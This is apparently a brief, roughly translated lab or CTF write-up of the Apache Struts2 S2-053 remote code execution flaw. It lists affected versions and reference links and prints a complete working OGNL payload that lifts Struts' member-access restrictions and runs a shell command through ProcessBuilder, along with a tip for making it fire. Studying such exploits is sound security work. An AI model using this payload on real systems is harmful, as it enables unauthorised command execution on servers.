1.S2-053 RCE from a topic
http://www.whalwl.cn:8027/hello.action
Vulnerability causes: Struts2 when using Freemarker template engine, while allowing OGNL analytical expressions. Leading to user-entered data itself is not OGNL resolved, but because Freemarker be resolved once after leaving to become an expression is parsed OGNL second time, leading to arbitrary command execution vulnerability. (To be honest, I did not understand what the meaning, but generally means there is no deal with user input, generate leads rce)
Affects Version: Struts 2.0.1 -Struts 2.3.33, Struts 2.5 - Struts 2.5.10
Reference is made to the content of these two articles and exp
https://www.freebuf.com/vuls/147735.html
https://blog.csdn.net/qq_29647709/article/details/84955205
Payload:
%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
payload marked in bold red is the command to be executed
It is worth saying that this payload has a small dip, and finally to click the new line, or can not execute the command
The principle behind what later supplemented the analysis